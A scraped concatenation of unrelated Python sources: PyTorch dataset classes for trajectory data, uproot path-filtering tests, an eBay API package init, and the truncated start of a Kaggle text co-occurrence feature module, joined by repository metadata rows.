            return image[:, :, 0]
        else:
            image = image[:, :, :3] # ignore alpha
            img = image[:, :, 0]/3 + image[:, :, 1]/3 + image[:, :, 2]/3
            return img
    def check_img_shape(self):
        """Return the (H, W) shape of the first frame of the first row."""
        info = self.info_frame.iloc[0]
        img_name = info['t0'].split('_')[0] + self.ext
        video_folder = info['index']
        img_path = os.path.join(self.root_dir, video_folder, img_name)
        image = self.togray(io.imread(img_path))
        return image.shape
class ImageStackDatasetSDD_ZIP(Dataset):
    """ZIP-archive variant of ImageStackDatasetSDD: identical sample layout,
    but CSV and images are read from one zipfile instead of the filesystem."""
    def __init__(self, zip_path, csv_path, root_dir, ext='.jpg', channel_per_image=None, transform=None, T_channel=False):
        '''
        Args:
            zip_path: Path (absolute) to the ZIP file with everything
            csv_path: Path (relative) to the CSV file with dataset info.
            root_dir: Directory (relative) with all image folders.
                root_dir - obj_folder - obj & other
            ext: image file extension.
            channel_per_image: unused; kept for signature compatibility.
            transform: optional callable applied to the sample dict.
            T_channel: if True, append one channel filled with the row's T.
        '''
        super().__init__()
        self.archive = zipfile.ZipFile(zip_path, 'r')
        self.info_frame = pd.read_csv(self.archive.open(csv_path))
        self.root_dir = root_dir
        self.tr = transform
        self.with_T = T_channel
        self.cpi = channel_per_image
        self.ext = ext
        self.nc = len(list(self.info_frame))-5 # number of image channels in half
        self.img_shape = self.check_img_shape()
    def __len__(self):
        return len(self.info_frame)
    def __getitem__(self, idx):
        if torch.is_tensor(idx):
            idx = idx.tolist()
        input_img = np.empty(shape=[self.img_shape[0], self.img_shape[1], 0])
        info = self.info_frame.iloc[idx]
        self.T = info['T']
        index = info['index']
        traj = []
        time_step = None  # robustness: defined even if self.nc == 0
        video_idx = info['index']
        # Perf fix: the archive scan and the original frame size are
        # loop-invariant; scan the namelist once instead of per channel.
        csv_name = [x for x in self.archive.namelist() if ((video_idx in x) & ('csv' in x))]
        original_scale = os.path.basename(csv_name[0]).split('.')[0]
        original_scale = (int(original_scale.split('_')[0]), int(original_scale.split('_')[1])) # HxW
        for i in range(self.nc):
            # column value encodes "<frame>_<x>_<y>"
            img_name = info[f't{i}'].split('_')[0] + self.ext
            img_path = os.path.join(self.root_dir, video_idx, img_name)
            time_step = int(info[f't{i}'].split('_')[0])
            this_x = float(info[f't{i}'].split('_')[1])
            this_y = float(info[f't{i}'].split('_')[2])
            traj.append([this_x, this_y])
            image = self.togray(io.imread(self.archive.open(img_path)))
            input_img = np.concatenate((input_img, image[:, :, np.newaxis]), axis=2)
            white_canvas = np.zeros_like(image)
            # original_scale is only needed if rescale_label is re-enabled:
            # obj_coords = self.rescale_label((this_x, this_y), original_scale)
            obj_coords = (this_x, this_y)
            obj_map = utils_np.np_gaudist_map(obj_coords, white_canvas, sigmas=[20, 20])
            input_img = np.concatenate((input_img, obj_map[:, :, np.newaxis]), axis=2)
        if self.with_T:
            T_channel = np.ones(shape=[self.img_shape[0], self.img_shape[1], 1])*self.T # T_channel
            input_img = np.concatenate((input_img, T_channel), axis=2) # T_channel
        label = {'x': info['x'], 'y': info['y']}
        sample = {'image': input_img, 'label': label}
        if self.tr:
            sample = self.tr(sample)
        sample['index'] = index
        sample['traj'] = traj
        sample['time'] = time_step
        return sample
    def rescale_label(self, label, original_scale): # x,y & HxW
        """Map an (x, y) label from the original frame size to the current one."""
        current_scale = self.check_img_shape()
        rescale = (current_scale[0]/original_scale[0], current_scale[1]/original_scale[1])
        return (label[0]*rescale[1], label[1]*rescale[0])
    def togray(self, image):
        """Collapse an image to a single 2-D grayscale plane (mean of RGB)."""
        if (len(image.shape) == 2):
            return image
        elif (len(image.shape) == 3) and (image.shape[2] == 1):
            return image[:, :, 0]
        else:
            image = image[:, :, :3] # ignore alpha
            img = image[:, :, 0]/3 + image[:, :, 1]/3 + image[:, :, 2]/3
            return img
    def check_img_shape(self):
        """Return the (H, W) shape of the first frame of the first row."""
        info = self.info_frame.iloc[0]
        img_name = info['t0'].split('_')[0] + self.ext
        video_folder = info['index']
        img_path = os.path.join(self.root_dir, video_folder, img_name)
        image = self.togray(io.imread(self.archive.open(img_path)))
        return image.shape
class ImageStackDatasetSDDtr(Dataset): # for trajectory
    """Trajectory variant of ImageStackDatasetSDD: the label is a dict of
    future (x, y) positions taken from the 'T*' columns."""
    def __init__(self, csv_path, root_dir, ext='.jpg', transform=None, T_channel=None):
        '''
        Args:
            csv_path: Path to the CSV file with dataset info.
            root_dir: Directory with all image folders.
                root_dir - video_folder - imgs
            ext: image file extension.
            transform: optional callable applied to the sample dict.
            T_channel: unused; kept for signature compatibility.
        '''
        super().__init__()
        self.info_frame = pd.read_csv(csv_path)
        self.root_dir = root_dir
        self.tr = transform
        self.ext = ext
        # number of image channels in half.
        # NOTE(review): counts columns whose name contains a lowercase 't'
        # (intended: t0..tn) — assumes no other column name contains 't'.
        self.nc = len([x for x in list(self.info_frame) if 't' in x])
        self.img_shape = self.check_img_shape()
    def __len__(self):
        return len(self.info_frame)
    def __getitem__(self, idx):
        if torch.is_tensor(idx):
            idx = idx.tolist()
        input_img = np.empty(shape=[self.img_shape[0], self.img_shape[1], 0])
        info = self.info_frame.iloc[idx]
        index = info['index']
        traj = []
        time_step = None  # robustness: defined even if self.nc == 0
        video_idx = info['index']
        # Perf fix: the csv lookup and the original frame size are
        # loop-invariant; resolve them once instead of globbing per channel.
        csv_name = glob.glob(os.path.join(self.root_dir, video_idx, '*.csv'))
        original_scale = os.path.basename(csv_name[0]).split('.')[0]
        original_scale = (int(original_scale.split('_')[0]), int(original_scale.split('_')[1])) # HxW
        for i in range(self.nc):
            # column value encodes "<frame>_<x>_<y>"
            img_name = info[f't{i}'].split('_')[0] + self.ext
            img_path = os.path.join(self.root_dir, video_idx, img_name)
            time_step = int(info[f't{i}'].split('_')[0])
            this_x = float(info[f't{i}'].split('_')[1])
            this_y = float(info[f't{i}'].split('_')[2])
            traj.append([this_x, this_y])
            image = self.togray(io.imread(img_path))
            input_img = np.concatenate((input_img, image[:, :, np.newaxis]), axis=2)
            white_canvas = np.zeros_like(image)
            # original_scale is only needed if rescale_label is re-enabled:
            # obj_coords = self.rescale_label((this_x, this_y), original_scale)
            obj_coords = (this_x, this_y)
            obj_map = utils_np.np_gaudist_map(obj_coords, white_canvas, sigmas=[20, 20])
            input_img = np.concatenate((input_img, obj_map[:, :, np.newaxis]), axis=2)
        # Future positions: every column containing 'T' holds "<x>_<y>".
        label_name_list = [x for x in list(self.info_frame) if 'T' in x]
        label_list = list(info[label_name_list].values)
        label_list = [(float(x.split('_')[0]), float(x.split('_')[1])) for x in label_list]
        label = dict(zip(label_name_list, label_list))
        sample = {'image': input_img, 'label': label}
        if self.tr:
            sample = self.tr(sample)
        sample['index'] = index
        sample['traj'] = traj
        sample['time'] = time_step
        return sample
    def rescale_label(self, label, original_scale): # x,y & HxW
        """Map an (x, y) label from the original frame size to the current one."""
        current_scale = self.check_img_shape()
        rescale = (current_scale[0]/original_scale[0], current_scale[1]/original_scale[1])
        return (label[0]*rescale[1], label[1]*rescale[0])
    def togray(self, image):
        """Collapse an image to a single 2-D grayscale plane (mean of RGB)."""
        if (len(image.shape) == 2):
            return image
        elif (len(image.shape) == 3) and (image.shape[2] == 1):
            return image[:, :, 0]
        else:
            image = image[:, :, :3] # ignore alpha
            img = image[:, :, 0]/3 + image[:, :, 1]/3 + image[:, :, 2]/3
            return img
    def check_img_shape(self):
        """Return the (H, W) shape of the first frame of the first row."""
        info = self.info_frame.iloc[0]
        img_name = info['t0'].split('_')[0] + self.ext
        video_folder = info['index']
        img_path = os.path.join(self.root_dir, video_folder, img_name)
        image = self.togray(io.imread(img_path))
        return image.shape
class ImageStackDatasetSDDtr_ZIP(Dataset): # for trajectory
    """ZIP-archive variant of ImageStackDatasetSDDtr: identical sample
    layout, but CSV and images are read from one zipfile."""
    def __init__(self, zip_path, csv_path, root_dir, ext='.jpg', transform=None, T_channel=None):
        '''
        Args:
            zip_path: Path (absolute) to the ZIP file with everything
            csv_path: Path (relative) to the CSV file with dataset info.
            root_dir: Directory (relative) with all image folders.
                root_dir - obj_folder - obj & other
            ext: image file extension.
            transform: optional callable applied to the sample dict.
            T_channel: unused; kept for signature compatibility.
        '''
        super().__init__()
        self.archive = zipfile.ZipFile(zip_path, 'r')
        self.info_frame = pd.read_csv(self.archive.open(csv_path))
        self.root_dir = root_dir
        self.tr = transform
        self.ext = ext
        # number of image channels in half.
        # NOTE(review): counts columns whose name contains a lowercase 't'
        # (intended: t0..tn) — assumes no other column name contains 't'.
        self.nc = len([x for x in list(self.info_frame) if 't' in x])
        self.img_shape = self.check_img_shape()
    def __len__(self):
        return len(self.info_frame)
    def __getitem__(self, idx):
        if torch.is_tensor(idx):
            idx = idx.tolist()
        input_img = np.empty(shape=[self.img_shape[0], self.img_shape[1], 0])
        info = self.info_frame.iloc[idx]
        index = info['index']
        traj = []
        time_step = None  # robustness: defined even if self.nc == 0
        video_idx = info['index']
        # Perf fix: the archive scan and the original frame size are
        # loop-invariant; scan the namelist once instead of per channel.
        csv_name = [x for x in self.archive.namelist() if ((video_idx in x) & ('csv' in x))]
        original_scale = os.path.basename(csv_name[0]).split('.')[0]
        original_scale = (int(original_scale.split('_')[0]), int(original_scale.split('_')[1])) # HxW
        for i in range(self.nc):
            # column value encodes "<frame>_<x>_<y>"
            img_name = info[f't{i}'].split('_')[0] + self.ext
            img_path = os.path.join(self.root_dir, video_idx, img_name)
            time_step = int(info[f't{i}'].split('_')[0])
            this_x = float(info[f't{i}'].split('_')[1])
            this_y = float(info[f't{i}'].split('_')[2])
            traj.append([this_x, this_y])
            image = self.togray(io.imread(self.archive.open(img_path)))
            input_img = np.concatenate((input_img, image[:, :, np.newaxis]), axis=2)
            white_canvas = np.zeros_like(image)
            # original_scale is only needed if rescale_label is re-enabled:
            # obj_coords = self.rescale_label((this_x, this_y), original_scale)
            obj_coords = (this_x, this_y)
            obj_map = utils_np.np_gaudist_map(obj_coords, white_canvas, sigmas=[20, 20])
            input_img = np.concatenate((input_img, obj_map[:, :, np.newaxis]), axis=2)
        # Future positions: every column containing 'T' holds "<x>_<y>".
        label_name_list = [x for x in list(self.info_frame) if 'T' in x]
        label_list = list(info[label_name_list].values)
        label_list = [(float(x.split('_')[0]), float(x.split('_')[1])) for x in label_list]
        label = dict(zip(label_name_list, label_list))
        sample = {'image': input_img, 'label': label}
        if self.tr:
            sample = self.tr(sample)
        sample['index'] = index
        sample['traj'] = traj
        sample['time'] = time_step
        return sample
    def rescale_label(self, label, original_scale): # x,y & HxW
        """Map an (x, y) label from the original frame size to the current one."""
        current_scale = self.check_img_shape()
        rescale = (current_scale[0]/original_scale[0], current_scale[1]/original_scale[1])
        return (label[0]*rescale[1], label[1]*rescale[0])
    def togray(self, image):
        """Collapse an image to a single 2-D grayscale plane (mean of RGB)."""
        if (len(image.shape) == 2):
            return image
        elif (len(image.shape) == 3) and (image.shape[2] == 1):
            return image[:, :, 0]
        else:
            image = image[:, :, :3] # ignore alpha
            img = image[:, :, 0]/3 + image[:, :, 1]/3 + image[:, :, 2]/3
            return img
    def check_img_shape(self):
        """Return the (H, W) shape of the first frame of the first row."""
        info = self.info_frame.iloc[0]
        img_name = info['t0'].split('_')[0] + self.ext
        video_folder = info['index']
        img_path = os.path.join(self.root_dir, video_folder, img_name)
        image = self.togray(io.imread(self.archive.open(img_path)))
        return image.shape
class MaskStackWithSegSDD(Dataset):
    """Dataset that stacks one segmentation image with a Gaussian position
    map per observed time step of a row."""
    def __init__(self, csv_path, seg_path, channel_per_image=None, transform=None, T_channel=False):
        '''
        Args:
            csv_path: Path to the CSV file with dataset info.
            seg_path: Path to the segmentation image.
        '''
        super().__init__()
        self.info_frame = pd.read_csv(csv_path)
        self.seg_path = seg_path
        self.tr = transform
        self.with_T = T_channel
        # CSV carries 5 non-image columns; the rest are time-step columns.
        self.nc = len(list(self.info_frame)) - 5
        self.img_shape = self.check_img_shape()
    def __len__(self):
        return len(self.info_frame)
    def __getitem__(self, idx):
        if torch.is_tensor(idx):
            idx = idx.tolist()
        info = self.info_frame.iloc[idx]
        self.T = info['T']
        index = info['index']
        traj = []
        # First channel: the (grayscale) segmentation image.
        seg = self.togray(io.imread(self.seg_path))
        stack = np.empty(shape=[self.img_shape[0], self.img_shape[1], 0])
        stack = np.concatenate((stack, seg[:, :, np.newaxis]), axis=2)
        # One Gaussian position-map channel per time-step column "t<i>",
        # whose value encodes "<frame>_<x>_<y>".
        for step in range(self.nc):
            fields = info[f't{step}'].split('_')
            time_step = int(fields[0])
            this_x = float(fields[1])
            this_y = float(fields[2])
            traj.append([this_x, this_y])
            gau_map = utils_np.np_gaudist_map((this_x, this_y), np.zeros_like(seg), sigmas=[20, 20])
            stack = np.concatenate((stack, gau_map[:, :, np.newaxis]), axis=2)
        if self.with_T:
            t_plane = np.ones(shape=[self.img_shape[0], self.img_shape[1], 1]) * self.T  # T_channel
            stack = np.concatenate((stack, t_plane), axis=2)  # T_channel
        sample = {'image': stack, 'label': {'x': info['x'], 'y': info['y']}}
        if self.tr:
            sample = self.tr(sample)
        sample['index'] = index
        sample['traj'] = traj
        sample['time'] = time_step
        return sample
    def togray(self, image):
        """Collapse an image to a single 2-D grayscale plane (mean of RGB)."""
        ndim = len(image.shape)
        if ndim == 2:
            return image
        if ndim == 3 and image.shape[2] == 1:
            return image[:, :, 0]
        rgb = image[:, :, :3]  # ignore alpha
        return rgb[:, :, 0] / 3 + rgb[:, :, 1] / 3 + rgb[:, :, 2] / 3
    def check_img_shape(self):
        """Return the (H, W) shape of the segmentation image."""
        return self.togray(io.imread(self.seg_path)).shape
| 37.417047
| 122
| 0.563845
| 3,409
| 24,583
| 3.831622
| 0.043414
| 0.026795
| 0.035829
| 0.021436
| 0.976573
| 0.976573
| 0.96953
| 0.963099
| 0.959118
| 0.952151
| 0
| 0.01632
| 0.28715
| 24,583
| 656
| 123
| 37.474085
| 0.729057
| 0.085791
| 0
| 0.945263
| 0
| 0
| 0.021149
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.082105
| false
| 0
| 0.018947
| 0.014737
| 0.212632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2a75de702e865ba217f052343cc16b6d75f5e5f6
| 7,954
|
py
|
Python
|
tests/test_0118-fix-name-fetch-again.py
|
eic/uproot4
|
deb8d88c2643521f372bf5005c51af8926016c7e
|
[
"BSD-3-Clause"
] | 133
|
2020-05-08T21:34:11.000Z
|
2022-03-07T18:12:58.000Z
|
tests/test_0118-fix-name-fetch-again.py
|
eic/uproot4
|
deb8d88c2643521f372bf5005c51af8926016c7e
|
[
"BSD-3-Clause"
] | 269
|
2020-05-13T02:42:24.000Z
|
2022-03-24T20:24:16.000Z
|
tests/test_0118-fix-name-fetch-again.py
|
eic/uproot4
|
deb8d88c2643521f372bf5005c51af8926016c7e
|
[
"BSD-3-Clause"
] | 45
|
2020-05-15T17:48:04.000Z
|
2022-03-18T19:23:07.000Z
|
# BSD 3-Clause License; see https://github.com/scikit-hep/uproot4/blob/main/LICENSE
from __future__ import absolute_import
import pytest
import skhep_testdata
import uproot
def test_keys():
    """filter_name path resolution at tree, branch, and sub-branch level."""
    path = skhep_testdata.data_path("uproot-small-evnt-tree-fullsplit.root")
    with uproot.open(path)["tree"] as t:
        # (pattern, expected keys) seen from the tree itself.
        for pattern, expected in [
            ("P3.Px", ["evt/P3/P3.Px"]),
            ("/P3.Px", []),
            ("P3/P3.Px", []),
            ("evt/P3/P3.Px", ["evt/P3/P3.Px"]),
            ("/evt/P3/P3.Px", ["evt/P3/P3.Px"]),
        ]:
            assert t.keys(filter_name=pattern) == expected
        # Same patterns resolved relative to the "evt" branch.
        for pattern, expected in [
            ("P3.Px", ["P3/P3.Px"]),
            ("/P3.Px", []),
            ("P3/P3.Px", ["P3/P3.Px"]),
            ("/P3/P3.Px", ["P3/P3.Px"]),
            ("evt/P3/P3.Px", []),
        ]:
            assert t["evt"].keys(filter_name=pattern) == expected
        # And relative to the "evt/P3" sub-branch.
        for pattern, expected in [
            ("P3.Px", ["P3.Px"]),
            ("/P3.Px", ["P3.Px"]),
            ("P3/P3.Px", []),
        ]:
            assert t["evt/P3"].keys(filter_name=pattern) == expected
def test_numpy():
    """filter_name and expression handling for library='np' output dicts.

    With filter_name, result keys are branch names relative to the object
    queried; with positional expressions, keys keep the name as written.
    """
    with uproot.open(skhep_testdata.data_path("uproot-small-evnt-tree-fullsplit.root"))[
        "tree"
    ] as t:
        # filter_name: a leading "/" anchors the pattern at this object's level
        assert list(t.arrays(filter_name="P3.Px", library="np").keys()) == ["P3.Px"]
        assert list(t.arrays(filter_name="/P3.Px", library="np").keys()) == []
        assert list(t.arrays(filter_name="P3/P3.Px", library="np").keys()) == []
        assert list(t.arrays(filter_name="evt/P3/P3.Px", library="np").keys()) == [
            "P3.Px"
        ]
        assert list(t.arrays(filter_name="/evt/P3/P3.Px", library="np").keys()) == [
            "P3.Px"
        ]
        # same patterns queried from the 'evt' branch
        assert list(t["evt"].arrays(filter_name="P3.Px", library="np").keys()) == [
            "P3.Px"
        ]
        assert list(t["evt"].arrays(filter_name="/P3.Px", library="np").keys()) == []
        assert list(t["evt"].arrays(filter_name="P3/P3.Px", library="np").keys()) == [
            "P3.Px"
        ]
        assert list(t["evt"].arrays(filter_name="/P3/P3.Px", library="np").keys()) == [
            "P3.Px"
        ]
        assert (
            list(t["evt"].arrays(filter_name="evt/P3/P3.Px", library="np").keys()) == []
        )
        # and from the 'evt/P3' branch
        assert list(t["evt/P3"].arrays(filter_name="P3.Px", library="np").keys()) == [
            "P3.Px"
        ]
        assert list(t["evt/P3"].arrays(filter_name="/P3.Px", library="np").keys()) == [
            "P3.Px"
        ]
        assert (
            list(t["evt/P3"].arrays(filter_name="P3/P3.Px", library="np").keys()) == []
        )
        # positional expressions: keys keep the requested spelling; a leading
        # "/" is not a valid expression and raises
        assert list(t.arrays("P3.Px", library="np").keys()) == ["P3.Px"]
        with pytest.raises(Exception):
            t.arrays("/P3.Px", library="np")
        assert list(t.arrays("evt/P3/P3.Px", library="np").keys()) == ["evt/P3/P3.Px"]
        assert list(t.arrays("/evt/P3/P3.Px", library="np").keys()) == ["/evt/P3/P3.Px"]
        assert list(t["evt"].arrays("P3.Px", library="np").keys()) == ["P3.Px"]
        with pytest.raises(Exception):
            t["evt"].arrays("/P3.Px", library="np")
        assert list(t["evt"].arrays("P3/P3.Px", library="np").keys()) == ["P3/P3.Px"]
        assert list(t["evt/P3"].arrays("P3.Px", library="np").keys()) == ["P3.Px"]
        assert list(t["evt/P3"].arrays("/P3.Px", library="np").keys()) == ["/P3.Px"]
def test_awkward():
    """Same path-anchoring checks as test_numpy, via library='ak' .fields."""
    awkward = pytest.importorskip("awkward")
    path = skhep_testdata.data_path("uproot-small-evnt-tree-fullsplit.root")
    with uproot.open(path)["tree"] as t:
        # filter_name matching: (object, pattern, expected field list)
        filter_cases = [
            (t, "P3.Px", ["P3.Px"]),
            (t, "/P3.Px", []),
            (t, "P3/P3.Px", []),
            (t, "evt/P3/P3.Px", ["P3.Px"]),
            (t, "/evt/P3/P3.Px", ["P3.Px"]),
            (t["evt"], "P3.Px", ["P3.Px"]),
            (t["evt"], "/P3.Px", []),
            (t["evt"], "P3/P3.Px", ["P3.Px"]),
            (t["evt"], "/P3/P3.Px", ["P3.Px"]),
            (t["evt"], "evt/P3/P3.Px", []),
            (t["evt/P3"], "P3.Px", ["P3.Px"]),
            (t["evt/P3"], "/P3.Px", ["P3.Px"]),
            (t["evt/P3"], "P3/P3.Px", []),
        ]
        for obj, pattern, expected in filter_cases:
            assert obj.arrays(filter_name=pattern, library="ak").fields == expected
        # positional expressions keep the requested spelling; a leading "/"
        # is not a valid expression and raises
        assert t.arrays("P3.Px", library="ak").fields == ["P3.Px"]
        with pytest.raises(Exception):
            t.arrays("/P3.Px", library="ak")
        assert t.arrays("evt/P3/P3.Px", library="ak").fields == ["evt/P3/P3.Px"]
        assert t.arrays("/evt/P3/P3.Px", library="ak").fields == ["/evt/P3/P3.Px"]
        assert t["evt"].arrays("P3.Px", library="ak").fields == ["P3.Px"]
        with pytest.raises(Exception):
            t["evt"].arrays("/P3.Px", library="ak")
        assert t["evt"].arrays("P3/P3.Px", library="ak").fields == ["P3/P3.Px"]
        assert t["evt/P3"].arrays("P3.Px", library="ak").fields == ["P3.Px"]
        assert t["evt/P3"].arrays("/P3.Px", library="ak").fields == ["/P3.Px"]
def test_pandas():
    """filter_name and expression handling for library='pd' DataFrame columns.

    Mirrors test_numpy: filter_name yields columns relative to the queried
    object; positional expressions keep the column name as written.
    """
    pandas = pytest.importorskip("pandas")
    with uproot.open(skhep_testdata.data_path("uproot-small-evnt-tree-fullsplit.root"))[
        "tree"
    ] as t:
        # filter_name: a leading "/" anchors the pattern at this object's level
        assert t.arrays(filter_name="P3.Px", library="pd").columns.tolist() == ["P3.Px"]
        assert t.arrays(filter_name="/P3.Px", library="pd").columns.tolist() == []
        assert t.arrays(filter_name="P3/P3.Px", library="pd").columns.tolist() == []
        assert t.arrays(filter_name="evt/P3/P3.Px", library="pd").columns.tolist() == [
            "P3.Px"
        ]
        assert t.arrays(filter_name="/evt/P3/P3.Px", library="pd").columns.tolist() == [
            "P3.Px"
        ]
        # same patterns queried from the 'evt' branch
        assert t["evt"].arrays(filter_name="P3.Px", library="pd").columns.tolist() == [
            "P3.Px"
        ]
        assert (
            t["evt"].arrays(filter_name="/P3.Px", library="pd").columns.tolist() == []
        )
        assert t["evt"].arrays(
            filter_name="P3/P3.Px", library="pd"
        ).columns.tolist() == ["P3.Px"]
        assert t["evt"].arrays(
            filter_name="/P3/P3.Px", library="pd"
        ).columns.tolist() == ["P3.Px"]
        assert (
            t["evt"].arrays(filter_name="evt/P3/P3.Px", library="pd").columns.tolist()
            == []
        )
        # and from the 'evt/P3' branch
        assert t["evt/P3"].arrays(
            filter_name="P3.Px", library="pd"
        ).columns.tolist() == ["P3.Px"]
        assert t["evt/P3"].arrays(
            filter_name="/P3.Px", library="pd"
        ).columns.tolist() == ["P3.Px"]
        assert (
            t["evt/P3"].arrays(filter_name="P3/P3.Px", library="pd").columns.tolist()
            == []
        )
        # positional expressions: columns keep the requested spelling; a
        # leading "/" is not a valid expression and raises
        assert t.arrays("P3.Px", library="pd").columns.tolist() == ["P3.Px"]
        with pytest.raises(Exception):
            t.arrays("/P3.Px", library="pd")
        assert t.arrays("evt/P3/P3.Px", library="pd").columns.tolist() == [
            "evt/P3/P3.Px"
        ]
        assert t.arrays("/evt/P3/P3.Px", library="pd").columns.tolist() == [
            "/evt/P3/P3.Px"
        ]
        assert t["evt"].arrays("P3.Px", library="pd").columns.tolist() == ["P3.Px"]
        with pytest.raises(Exception):
            t["evt"].arrays("/P3.Px", library="pd")
        assert t["evt"].arrays("P3/P3.Px", library="pd").columns.tolist() == [
            "P3/P3.Px"
        ]
        assert t["evt/P3"].arrays("P3.Px", library="pd").columns.tolist() == ["P3.Px"]
        assert t["evt/P3"].arrays("/P3.Px", library="pd").columns.tolist() == ["/P3.Px"]
| 45.976879
| 88
| 0.537465
| 1,109
| 7,954
| 3.791704
| 0.050496
| 0.125565
| 0.172652
| 0.094174
| 0.940547
| 0.940547
| 0.939596
| 0.923424
| 0.896552
| 0.896552
| 0
| 0.032999
| 0.222781
| 7,954
| 172
| 89
| 46.244186
| 0.647202
| 0.010184
| 0
| 0.286624
| 0
| 0
| 0.186253
| 0.018803
| 0
| 0
| 0
| 0
| 0.464968
| 1
| 0.025478
| false
| 0
| 0.038217
| 0
| 0.063694
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2a82f5ecd6abb8b4fc26d4ff27da74499eedba83
| 207
|
py
|
Python
|
src/ebay_rest/api/sell_metadata/api/__init__.py
|
gbm001/ebay_rest
|
077d3478423ccd80ff35e0361821d6a11180bc54
|
[
"MIT"
] | 3
|
2021-12-12T04:28:03.000Z
|
2022-03-10T03:29:18.000Z
|
src/ebay_rest/api/sell_metadata/api/__init__.py
|
jdavv/ebay_rest
|
20fc88c6aefdae9ab90f9c1330e79abddcd750cd
|
[
"MIT"
] | 33
|
2021-06-16T20:44:36.000Z
|
2022-03-30T14:55:06.000Z
|
src/ebay_rest/api/sell_metadata/api/__init__.py
|
jdavv/ebay_rest
|
20fc88c6aefdae9ab90f9c1330e79abddcd750cd
|
[
"MIT"
] | 7
|
2021-06-03T09:30:23.000Z
|
2022-03-08T19:51:33.000Z
|
from __future__ import absolute_import
# flake8: noqa
# import apis into api package
from ...sell_metadata.api.country_api import CountryApi
from ...sell_metadata.api.marketplace_api import MarketplaceApi
| 25.875
| 63
| 0.826087
| 28
| 207
| 5.785714
| 0.571429
| 0.098765
| 0.197531
| 0.234568
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005435
| 0.111111
| 207
| 7
| 64
| 29.571429
| 0.875
| 0.198068
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aa73656b2dbfbcf460847cdf21254f2854d99343
| 14,009
|
py
|
Python
|
Code/Chenglong/feature_stat_cooc_tfidf.py
|
ChenglongChen/Kaggle_Homedepot
|
55c1033d0af3b6cf2f033fe4bcf3e1e0ffda3445
|
[
"MIT"
] | 465
|
2016-04-27T13:17:36.000Z
|
2020-05-15T11:05:13.000Z
|
Code/Chenglong/feature_stat_cooc_tfidf.py
|
CharlotteSean/Kaggle_HomeDepot
|
55c1033d0af3b6cf2f033fe4bcf3e1e0ffda3445
|
[
"MIT"
] | 1
|
2016-10-15T04:33:54.000Z
|
2016-10-15T04:33:54.000Z
|
Code/Chenglong/feature_stat_cooc_tfidf.py
|
CharlotteSean/Kaggle_HomeDepot
|
55c1033d0af3b6cf2f033fe4bcf3e1e0ffda3445
|
[
"MIT"
] | 230
|
2016-04-30T06:35:17.000Z
|
2019-12-04T08:23:22.000Z
|
# -*- coding: utf-8 -*-
"""
@author: Chenglong Chen <c.chenglong@gmail.com>
@brief: statistical cooccurrence (weighted) features
- TF & normalized TF
- TFIDF & normalized TFIDF
- Okapi BM25
"""
import sys
import string
from collections import defaultdict
import numpy as np
import pandas as pd
import config
from utils import dist_utils, ngram_utils, nlp_utils, np_utils, pkl_utils
from utils import logging_utils, time_utils
from feature_base import BaseEstimator, PairwiseFeatureWrapper
# tune the token pattern to get a better correlation with y_train
# token_pattern = r"(?u)\b\w\w+\b"
# token_pattern = r"\w{1,}"
# token_pattern = r"\w+"
# token_pattern = r"[\w']+"
token_pattern = " " # just split the text into tokens
# ----------------------------- TF ------------------------------------
# StatCooc stands for StatisticalCooccurrence
class StatCoocTF_Ngram(BaseEstimator):
    """Single aggregation features.

    Co-occurrence term frequency: for every ngram of the observation text,
    count how many target ngrams (fuzzily) match it.
    """

    def __init__(self, obs_corpus, target_corpus, ngram, aggregation_mode="",
                 str_match_threshold=config.STR_MATCH_THRESHOLD):
        super().__init__(obs_corpus, target_corpus, aggregation_mode)
        self.ngram = ngram
        self.ngram_str = ngram_utils._ngram_str_map[ngram]
        self.str_match_threshold = str_match_threshold

    def __name__(self):
        # One name per aggregation mode; aggregation_mode is a str or a list.
        fmt = "StatCoocTF_%s_%s"
        if isinstance(self.aggregation_mode, str):
            feat_name = fmt % (self.ngram_str,
                               string.capwords(self.aggregation_mode))
        elif isinstance(self.aggregation_mode, list):
            feat_name = [fmt % (self.ngram_str, string.capwords(m))
                         for m in self.aggregation_mode]
        return feat_name

    def transform_one(self, obs, target, id):
        """Return, per obs ngram, the (fuzzy) match count in target ngrams."""
        threshold = self.str_match_threshold
        obs_ngrams = ngram_utils._ngrams(
            nlp_utils._tokenize(obs, token_pattern), self.ngram)
        target_ngrams = ngram_utils._ngrams(
            nlp_utils._tokenize(target, token_pattern), self.ngram)
        counts = [
            float(sum(1 for w2 in target_ngrams
                      if dist_utils._is_str_match(w1, w2, threshold)))
            for w1 in obs_ngrams
        ]
        return counts if counts else [config.MISSING_VALUE_NUMERIC]
# ----------------------------- Normalized TF ------------------------------------
# StatCooc stands for StatisticalCooccurrence
class StatCoocNormTF_Ngram(BaseEstimator):
    """Single aggregation features.

    Normalized co-occurrence term frequency: per obs ngram, the fuzzy match
    count divided by the number of target ngrams.
    """
    def __init__(self, obs_corpus, target_corpus, ngram, aggregation_mode="",
        str_match_threshold=config.STR_MATCH_THRESHOLD):
        super().__init__(obs_corpus, target_corpus, aggregation_mode)
        self.ngram = ngram
        self.ngram_str = ngram_utils._ngram_str_map[self.ngram]
        self.str_match_threshold = str_match_threshold
    def __name__(self):
        # Feature name(s); aggregation_mode may be a str or a list of str.
        if isinstance(self.aggregation_mode, str):
            feat_name = "StatCoocNormTF_%s_%s"%(
                self.ngram_str, string.capwords(self.aggregation_mode))
